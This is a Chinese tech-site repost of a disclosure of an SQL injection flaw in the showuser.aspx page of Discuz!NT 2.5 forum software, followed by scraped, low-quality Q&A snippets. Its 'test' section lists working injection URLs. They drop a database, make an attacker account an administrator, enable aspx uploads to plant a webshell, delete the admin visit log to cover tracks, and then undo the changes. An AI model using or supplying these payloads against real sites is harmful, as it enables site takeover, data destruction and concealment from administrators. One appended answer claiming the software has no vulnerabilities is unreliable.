惊爆Discuz!NT 2.5重大漏洞

欢迎您访问我爱IT技术网，今天小编为你分享的电脑教程是建站经验系列之：【惊爆Discuz!NT 2.5重大漏洞】，下面是详细的分享！

惊爆Discuz!NT 2.5重大漏洞

　　漏洞说明：Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework，默认支持 SQLServer数据库，可扩展支持Access、MySQL等多种数据库，支持IIS5、IIS6、IIS7，安全高效、稳定易用，充分发挥 ASP.net 特性，支持自由选择切换皮肤，支持多种其它论坛的数据转换。

　　Discuz!NT 2.5 强化论坛功能，提高速度和稳定性，负载能力也有显著改善，在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包，供用户自由选择安装，体现出强大的伸缩扩展性。无论是从功能、性能，还是从支持环境等角度来看，都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞，成功利用此漏洞可以直接修改管理员的密码进入后台，取得管理员权限，从而控制整个网站。

　　漏洞厂商：http://www.comsenz.com

　　漏洞解析：在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入，恶意攻击用户甚至不用注册账户，只要精心构造ordertype即可利用此漏洞。

　　漏洞测试：

　　http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;–

　　http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=’1′,groupid=’1′ where username=’webtets’;–//更新为管理员

　　http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’aspx’ where extension=’jpg’;– //更新为aspx可上传

　　得到SHELL后…

　　http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’jpg’ where extension=’aspx’;– //更新回JPG

　　http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username=’webtets’;– //删除日志

　　http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=”,groupid=” where username=’webtets’;–//取消管理员

以上所分享的是关于惊爆Discuz!NT 2.5重大漏洞，下面是编辑为你推荐的有价值的用户互动：

　　相关问题：如何修复Discuz!X2/2.5弱口令破解漏洞？

　　答：顶顶顶！支持支持支持！ >>详细

　　相关问题：dz2.5有漏洞吗

　　答：dz2.5是很成熟的程序了，没有什么漏洞。 >>详细

　　相关问题：discuz X2.5 有哪些漏洞

　　答：建议安全软件排查漏洞 打开腾讯电脑管家——工具箱——修复漏洞，进行漏洞扫描和修复。 电脑管家建议用户设置开启自动修复漏洞功能，开启后，电脑管家可以在发现高危漏洞（仅包括高危漏洞，不包括其它漏洞）时，第一时间自动进行修复，无需用户参与... >>详细